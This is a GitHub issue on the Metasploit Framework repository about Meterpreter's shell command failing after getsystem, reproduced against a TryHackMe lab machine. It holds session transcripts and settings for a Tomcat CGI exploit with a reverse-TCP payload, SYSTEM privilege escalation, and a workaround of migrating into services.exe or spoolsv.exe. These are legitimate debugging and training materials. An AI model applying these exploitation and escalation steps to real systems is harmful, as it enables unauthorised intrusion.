search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
33.22k stars 13.79k forks source link

Meterpreter's shell command no longer interactive after getsystem command is run #14508

Open AlanFoster opened 3 years ago

AlanFoster commented 3 years ago

Steps to reproduce

Target: https://tryhackme.com/room/adventofcyber2 Day 12 Task 17 - Networking Ready, set, elf.

Getting meterpreter shell works fine; Running the shell command also works fine. However, after running getsystem the shell command no longer works as expected:

meterpreter > 
[!] Make sure to manually cleanup the exe generated by the exploit
dir
Listing: C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi-bin
============================================================================================

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100666/rw-rw-rw-  6985     fil   2020-12-13 19:38:05 -0500  Vctra.b64
100777/rwxrwxrwx  825      fil   2020-11-18 22:49:25 -0500  elfwhacker.bat
100666/rw-rw-rw-  27       fil   2020-11-19 17:05:43 -0500  flag1.txt
100777/rwxrwxrwx  73802    fil   2020-12-13 19:33:07 -0500  hNSSF.exe
100777/rwxrwxrwx  2332672  fil   2020-12-13 19:29:37 -0500  ncat.exe
100777/rwxrwxrwx  73802    fil   2020-12-13 19:38:42 -0500  njJpP.exe
100777/rwxrwxrwx  73802    fil   2020-12-13 19:44:55 -0500  xlueA.exe

meterpreter > shell
Process 3208 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi-bin>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 4277-4242

 Directory of C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi-bin

14/12/2020  00:44    <DIR>          .
14/12/2020  00:44    <DIR>          ..
19/11/2020  21:39               825 elfwhacker.bat
19/11/2020  22:06                27 flag1.txt
14/12/2020  00:33            73,802 hNSSF.exe
14/12/2020  00:29         2,332,672 ncat.exe
14/12/2020  00:38            73,802 njJpP.exe
14/12/2020  00:38             6,985 Vctra.b64
14/12/2020  00:44            73,802 xlueA.exe
               7 File(s)      2,561,915 bytes
               2 Dir(s)   6,271,860,736 bytes free

C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi-bin>exit
exit
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > shell
Process 3412 created.
Channel 2 created.
meterpreter > shell
Process 4012 created.
Channel 3 created.
meterpreter > shell
Process 3772 created.
Channel 4 created.
meterpreter >

Expected behavior

shell works after running getsystem

Current behavior

shell no longer works:

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > shell
Process 3412 created.
Channel 2 created.
meterpreter > shell
Process 4012 created.
Channel 3 created.
meterpreter > shell
Process 3772 created.
Channel 4 created.
meterpreter >

Logs show:

[12/13/2020 19:52:36] [w(0)] core: monitor_rsock: the remote socket is nil, exiting loop

Metasploit version

msf6 exploit(windows/http/tomcat_cgi_cmdlineargs) > version
Framework: 6.0.18-dev
Console  : 6.0.18-dev

Additional Information

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

Collapse ``` [framework/core] loglevel=3 sessionlogging=true [framework/features] wrapped_tables=true RHOST_HTTP_URL=false [framework/ui/console] ActiveModule=exploit/windows/http/tomcat_cgi_cmdlineargs [windows/http/tomcat_cgi_cmdlineargs] RPORT=8080 WORKSPACE= VERBOSE=false WfsDelay=0 EnableContextEncoding=false ContextInformationFile= DisablePayloadHandler=false EXE::EICAR=false EXE::Custom= EXE::Path= EXE::Template= EXE::Inject=false EXE::OldMethod=false EXE::FallBack=false MSI::EICAR=false MSI::Custom= MSI::Path= MSI::Template= MSI::UAC=false ListenerComm= SSL=false SSLCert= SSLCompression=false SSLCipher= TCP::max_send_size=0 TCP::send_delay=0 RHOSTS=10.10.227.63 VHOST= Proxies= UserAgent=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) HttpUsername= HttpPassword= HttpRawHeaders= DigestAuthIIS=true SSLVersion=Auto FingerprintCheck=true DOMAIN=WORKSTATION HttpClientTimeout= HttpTrace=false HttpTraceHeadersOnly=false HttpTraceColors=red/blu HTTP::uri_encode_mode=hex-normal HTTP::uri_full_url=false HTTP::pad_method_uri_count=1 HTTP::pad_uri_version_count=1 HTTP::pad_method_uri_type=space HTTP::pad_uri_version_type=space HTTP::method_random_valid=false HTTP::method_random_invalid=false HTTP::method_random_case=false HTTP::version_random_valid=false HTTP::version_random_invalid=false HTTP::uri_dir_self_reference=false HTTP::uri_dir_fake_relative=false HTTP::uri_use_backslashes=false HTTP::pad_fake_headers=false HTTP::pad_fake_headers_count=0 HTTP::pad_get_params=false HTTP::pad_get_params_count=16 HTTP::pad_post_params=false HTTP::pad_post_params_count=16 HTTP::uri_fake_end=false HTTP::uri_fake_params_start=false HTTP::header_folding=false HTTP::no_cache=false HTTP::chunked=false HTTP::junk_headers=false HTTP::compression=none HTTP::server_name=Apache URIHOST= URIPORT= SendRobots=false CMDSTAGER::FLAVOR=auto CMDSTAGER::DECODER= CMDSTAGER::TEMP= CMDSTAGER::SSL=false TARGETURI=/cgi-bin/elfwhacker.bat AutoCheck=true ForceExploit=false PAYLOAD=windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=4444 ReverseListenerBindPort= ReverseAllowProxy=false ReverseListenerComm= ReverseListenerBindAddress= ReverseListenerThreaded=false StagerRetryCount=10 StagerRetryWait=5 PingbackRetries=0 PingbackSleep=30 PayloadUUIDSeed= PayloadUUIDRaw= PayloadUUIDName= PayloadUUIDTracking=false EnableStageEncoding=false StageEncoder= StageEncoderSaveRegisters= StageEncodingFallback=true PrependMigrate=false PrependMigrateProc= EXITFUNC=process PayloadBindPort= AutoLoadStdapi=true AutoVerifySession=true AutoVerifySessionTimeout=30 InitialAutoRunScript= AutoRunScript= AutoSystemInfo=true EnableUnicodeEncoding=false HandlerSSLCert= SessionRetryTotal=3600 SessionRetryWait=10 SessionExpirationTimeout=604800 SessionCommunicationTimeout=300 PayloadProcessCommandLine= AutoUnhookProcess=false TARETURI=/cgi-bin/elfwhacker.bat ```

History

The following commands were ran during the session and before this issue occurred:

Collapse ``` 2885 use windows/http/tomcat_cgi_cmdlineargs 2886 options 2887 set LHOST tun0 2888 set TARETURI /cgi-bin/elfwhacker.bat 2889 set RHOSTS 10.10.227.63 2890 options 2891 run 2892 set TARGETURI /cgi-bin/elfwhacker.bat 2893 check 2894 run 2895 dir 2896 shell 2897 getsystem 2898 shell 2899 setg loglevel 3 2900 sessions -i -1 2901 shell 2902 debug ```

Framework Errors

The following framework errors occurred before the issue occurred:

Collapse ``` [12/13/2020 19:41:32] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [12/13/2020 19:41:32] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [12/13/2020 19:41:32] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [12/13/2020 19:41:32] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported [12/13/2020 19:41:36] [e(0)] core: Unexpected output running /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py: Traceback (most recent call last): File "/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue_win8.py", line 178, in ntfea9000 = (pack('' [12/13/2020 19:41:36] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported [12/13/2020 19:41:36] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported [12/13/2020 19:41:36] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported [12/13/2020 19:41:36] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported ```

Web Service Errors

The following web service errors occurred before the issue occurred:

Collapse ``` msf-ws.log does not exist. ```

Framework Logs

The following framework logs were recorded before the issue occurred:

Collapse ``` [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: none to bind [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/bind_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: tunnel to bind [12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/bind_tcp_uuid is compatible with windows/http/tomcat_cgi_cmdlineargs [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/http/tomcat_cgi_cmdlineargs]: reverse to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/http/tomcat_cgi_cmdlineargs]: bind to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/http/tomcat_cgi_cmdlineargs]: noconn to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/http/tomcat_cgi_cmdlineargs]: none to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_http with windows/http/tomcat_cgi_cmdlineargs]: tunnel to tunnel [12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_http is compatible with windows/http/tomcat_cgi_cmdlineargs [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/http/tomcat_cgi_cmdlineargs]: reverse to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/http/tomcat_cgi_cmdlineargs]: bind to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/http/tomcat_cgi_cmdlineargs]: noconn to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/http/tomcat_cgi_cmdlineargs]: none to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_https with windows/http/tomcat_cgi_cmdlineargs]: tunnel to tunnel [12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_https is compatible with windows/http/tomcat_cgi_cmdlineargs [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/http/tomcat_cgi_cmdlineargs]: reverse to reverse [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/http/tomcat_cgi_cmdlineargs]: bind to reverse [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/http/tomcat_cgi_cmdlineargs]: noconn to reverse [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/http/tomcat_cgi_cmdlineargs]: none to reverse [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp with windows/http/tomcat_cgi_cmdlineargs]: tunnel to reverse [12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_tcp is compatible with windows/http/tomcat_cgi_cmdlineargs [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/http/tomcat_cgi_cmdlineargs]: reverse to reverse [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/http/tomcat_cgi_cmdlineargs]: bind to reverse [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/http/tomcat_cgi_cmdlineargs]: noconn to reverse [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/http/tomcat_cgi_cmdlineargs]: none to reverse [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_rc4 with windows/http/tomcat_cgi_cmdlineargs]: tunnel to reverse [12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_tcp_rc4 is compatible with windows/http/tomcat_cgi_cmdlineargs [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: reverse to reverse [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: bind to reverse [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: noconn to reverse [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: none to reverse [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_tcp_uuid with windows/http/tomcat_cgi_cmdlineargs]: tunnel to reverse [12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_tcp_uuid is compatible with windows/http/tomcat_cgi_cmdlineargs [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/http/tomcat_cgi_cmdlineargs]: reverse to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/http/tomcat_cgi_cmdlineargs]: bind to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/http/tomcat_cgi_cmdlineargs]: noconn to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/http/tomcat_cgi_cmdlineargs]: none to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttp with windows/http/tomcat_cgi_cmdlineargs]: tunnel to tunnel [12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_winhttp is compatible with windows/http/tomcat_cgi_cmdlineargs [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/http/tomcat_cgi_cmdlineargs]: reverse to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/http/tomcat_cgi_cmdlineargs]: bind to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/http/tomcat_cgi_cmdlineargs]: noconn to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/http/tomcat_cgi_cmdlineargs]: none to tunnel [12/13/2020 19:41:37] [d(3)] core: Checking compat [windows/x64/vncinject/reverse_winhttps with windows/http/tomcat_cgi_cmdlineargs]: tunnel to tunnel [12/13/2020 19:41:37] [d(1)] core: Module windows/x64/vncinject/reverse_winhttps is compatible with windows/http/tomcat_cgi_cmdlineargs [12/13/2020 19:46:32] [w(0)] core: monitor_rsock: the remote socket is nil, exiting loop [12/13/2020 19:46:38] [w(0)] core: monitor_rsock: the remote socket is nil, exiting loop [12/13/2020 19:46:41] [w(0)] core: monitor_rsock: the remote socket is nil, exiting loop [12/13/2020 19:47:13] [w(0)] core: monitor_rsock: the remote socket is nil, exiting loop [12/13/2020 19:47:55] [w(0)] core: monitor_rsock: the remote socket is nil, exiting loop ```

Web Service Logs

The following web service logs were recorded before the issue occurred:

Collapse ``` msf-ws.log does not exist. ```

Version/Install

The versions and install method of your Metasploit setup:

Collapse ``` Framework: 6.0.18-dev Ruby: ruby 2.7.1p83 (2020-03-31 revision a0c7c23c9c) [x86_64-linux-gnu] Install Root: /usr/share/metasploit-framework Session Type: postgresql selected, no connection Install Method: Other - Please specify ```
thornflynt commented 3 years ago

Am having the same issue with the exact same context on tryhackme's AoC2

gwillcox-r7 commented 3 years ago

Hmm just retested this on a Windows Server 2016 x64 target and near as I can tell this doesn't seem to be occurring for me.

msf6 exploit(multi/handler) > run

[*] Started bind TCP handler against 172.26.192.240:4444
[*] Sending stage (200262 bytes) to 172.26.192.240
[*] Meterpreter session 2 opened (0.0.0.0:0 -> 172.26.192.240:4444) at 2021-02-22 16:10:10 -0600

meterpreter > shell
Process 1672 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\Desktop>whoami
whoami
win-qka9jks5mvu\administrator

C:\Users\Administrator\Desktop>exit
exit
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 7956 created.
Channel 3 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\Desktop>whoami
whoami
win-qka9jks5mvu\administrator

C:\Users\Administrator\Desktop>exit
exit
gmeterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
[*] Backgrounding session 2...
msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/x64/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     172.26.192.240   no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf6 exploit(multi/handler) >

When I tried it on the target using a command stager exploit which I think is where the difference comes in I notice I don't get the same warning about trying to run shell as the SYSTEM user and the automatic downgrading taking place. Furthermore, when I try use rev2self to drop back down to a normal user, I'm able to run the shell command again, despite previously not being able to run it.

msf6 exploit(windows/http/tomcat_cgi_cmdlineargs) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: TBFC-WEB-01\elfmcskidy
meterpreter > sysinfo
Computer        : TBFC-WEB-01
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 2732 created.
Channel 1 created.
meterpreter > sysinfo
Computer        : TBFC-WEB-01
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x86/windows
meterpreter > rev2self
meterpreter > shell
Process 1096 created.
Channel 2 created.
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi-bin>
T0m-Ph commented 3 years ago

I faced a similar issue: running seemingly successfully the getsystemcommand, but not getting a shell after that. After a few tests it seems that the reason for this behavior is that Windows uses the Primary Token (and not the impersonated token obtained with the getsystemcommand) of a process to determine the actions that the process can perform. Most likely our current process's Primary Token does not allow us to pop a shell as SYSTEM.

To get around this problem, we can migrate to a process with higher permissions (such as services.exe) after using getsystem, but before requesting for a shell.

Finally, i feel like this migration part could probably be automated and added to the getsystemcommand.

Let me know if that fixes your issue :)

AlanFoster commented 3 years ago

@JackPepper Thanks for the workaround, that worked for me. After running getsystem, and migrating to the spoolsv.exe, it's now possible to open a shell :+1:

Also confirmed that rev2self works, but since you're no longer system with that approach - it's not as practical

Unibrighter commented 1 year ago

I faced a similar issue: running seemingly successfully the getsystemcommand, but not getting a shell after that. After a few tests it seems that the reason for this behavior is that Windows uses the Primary Token (and not the impersonated token obtained with the getsystemcommand) of a process to determine the actions that the process can perform. Most likely our current process's Primary Token does not allow us to pop a shell as SYSTEM.

To get around this problem, we can migrate to a process with higher permissions (such as services.exe) after using getsystem, but before requesting for a shell.

Finally, i feel like this migration part could probably be automated and added to the getsystemcommand.

Let me know if that fixes your issue :)

Thanks @T0m-Ph , this really helped me while doing one of the CTF. It's a great tip and glad to see someone who has been in the same situation solved this for the people who will be here in the future. :)